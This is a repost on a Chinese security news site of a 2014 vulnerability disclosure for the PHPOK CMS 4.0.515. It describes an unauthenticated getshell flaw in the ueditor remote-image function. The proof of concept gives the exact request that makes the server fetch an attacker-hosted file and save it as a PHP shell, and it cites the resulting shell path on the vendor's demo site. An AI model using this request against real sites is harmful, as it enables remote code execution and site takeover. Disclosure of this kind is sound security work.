设为首页 - 加入收藏 - 网站地图 SecYe安全 Www.SecYe.Com - 国内网络信息安全IT技术门户网
当前位置:SecYe > 安全中心 > 最新漏洞 > 正文

phpok通杀前台getshell 4.0.515官方demo测试成功

时间:2014-06-25 12:39 来源:未知 作者:www.secye.com 阅读:

无任何限制,不用注册账号,不用csrf,不用注入。一个请求直接getshell。

不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题

详细说明:

/framework/www/ueditor_control.php行61

remote_image_f函数没对远程文件后缀做检查直接保存到本地

这个真心没什么好分析的我就不贴代码分析了

漏洞证明:

构造请求

/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php

 

我这里1.txt的内容是

 

测试问题嘛 不做破坏

 

0116020686c16e632111045598208f643379cf17

 

shell地址直接返回了。这里不返回也没事,文件名可以自己算出来。

 

http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php

 

01160315043f5872a131fa848c769c26ad486869

 

本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)

点击复制链接 与好友分享!

顶一下
(0)
0%
踩一下
(0)
0%